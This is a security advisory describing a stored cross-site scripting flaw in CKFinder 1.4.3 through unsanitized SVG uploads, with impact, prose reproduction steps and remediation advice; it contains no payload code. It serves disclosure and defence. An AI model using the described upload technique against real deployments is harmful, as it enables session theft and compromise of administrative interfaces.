CKFinder Stored Cross-Site Scripting Vulnerability via Malicious SVG Upload

A stored cross-site scripting vulnerability has been identified in CKFinder version 1.4.3. The issue arises in the file upload functionality, which does not properly sanitize SVG files containing active content. This flaw allows an attacker to execute arbitrary JavaScript in the context of the victim's browser when the uploaded file is viewed or previewed.

Impact

Exploitation of this vulnerability allows for the execution of arbitrary JavaScript in the context of the victim's browser, potentially leading to the theft of session tokens or sensitive information, manipulation of the Document Object Model, or redirection to malicious websites. In an administrative context, this could facilitate lateral movement within admin or management interfaces.

Reproduction

To reproduce this vulnerability, log into an application that uses CKFinder version 1.4.3. Navigate to the file upload feature and upload a crafted SVG file that contains JavaScript code. After the file is uploaded, access or preview it within the CKFinder file manager or any linked view. The JavaScript code will execute in the browser.

Remediation

Users are advised to sanitize and validate uploaded SVG files before storing or rendering them. If SVG uploads are not necessary, they should be disabled. For applications that require SVG uploads, use a secure SVG sanitizer, such as DOMPurify or SVG-Sanitizer, before rendering the files. Additionally, serve uploaded SVGs with secure response headers, including Content-Type, Content-Disposition, and X-Content-Type-Options. Consider hosting user-uploaded files on a separate domain or CDN to enforce origin isolation.